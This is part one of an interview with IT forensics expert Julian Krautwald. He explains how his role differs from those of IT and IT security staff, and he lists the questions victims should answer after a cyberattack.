In IT, forensic experts are among the most sought-after specialists of all, both at investigative authorities and in companies. They are responsible for securing traces and evidence in the event of a cyberattack. We asked our forensics expert Julian Krautwald about his work. In the first part of our conversation, we find out: What does an IT forensics expert actually do?
Julian, you are an IT forensics expert. What distinguishes your work from that of an IT expert?
The IT expert is your first contact when it comes to “all things technical”. He makes sure that your IT equipment works properly and that you have all the tools you need to perform your daily work on your workplace computer. In addition, he should be the first point of contact for technical problems and malfunctions at your workplace.
More specifically, he takes care of the installation, configuration, operation and maintenance of infrastructure/network components, systems and services, both hardware and software. He is responsible for technical fault diagnosis and takes care of the recovery of systems and data. He also oversees the documentation of technical process flows, action instructions and configurations.
Then there’s the IT security expert. What exactly does he do – as opposed to you?
At first, you don’t notice much of the IT security expert’s activities in your day-to-day work. This is mainly because the IT security expert works very closely with the IT expert to implement IT security measures, but not to be the first point of contact for the employees. You tend to “feel” the implemented measures of the IT security expert subconsciously. For example, if the operating system of your workstation computer suddenly prompts you (once again) to change your password for logging in. For most employees, many of these measures first appear to restrict the user-friendliness of the systems they are using. It is only when an IT security expert gives employees an insight into why certain measures are extremely important and what can happen if they are not implemented that this usually leads to more acceptance of his work in the company.
And at what point does your work as an IT forensic specialist become necessary?
Not until your company has already been the victim of a cyberattack – or you at least suspect that this is the case – and the colleagues described above cannot clearly determine how the incident occurred and/or what the best strategy is to contain the damage and return operations to “normal”. This is where an IT forensic analyst assists and advises these colleagues in diagnosis, analysis and root cause analysis, as well as prioritization of immediate actions in response to information security incidents.
This involves analyzing large amounts of data, technical logs and entire system images. The goal of the analysis: to prove signs and causes of an information security incident, to evaluate the level of compromise and, if necessary, to prepare the evidence found in a way that can be used in court. In addition, he is responsible for developing defense strategies and initiating necessary mitigation measures. He also defines the countermeasures. Last but not least, he documents the facts of the case and the activities carried out.
Ideally, what questions do victims need to be able to answer so you can quickly resolve and treat the cyber emergency?
To clarify what happened, it should at least be possible to answer the classic W questions:
List of questions in an emergency
- What exactly has happened?
- How was the incident discovered (For example, was there a warning message from the system? Do you notice an increased system load or longer response times?)
- What is the manifestation of the incident (e.g., anomalies on clients?!)?
- What activities were performed beforehand (e.g. surfing the WWW, reading e-mails, USB stick inserted?)
- Were immediate measures taken after the incident was discovered (e.g. virus scans, deletion of data, changes to system files)?
- Has there been a similar problem in the past?How was this problem dealt with?
- Which systems (OS) and/or applications are affected?
- How many systems are affected?
- Are they client systems, server systems, or both?
- Who has access to the affected systems?
- Which users / user groups are affected?
- How many users are affected?
- What rights do the affected users have on the affected systems?
- How are the affected systems secured (firewalls, AntiVirus, IDS, IPS, etc.)?
In general, however, the more detailed the incident can be described, the better it is for diagnosing and solving the problem. If a smartphone with camera function is available, it can also help if the incident is also documented with photos.
(End of Part 1)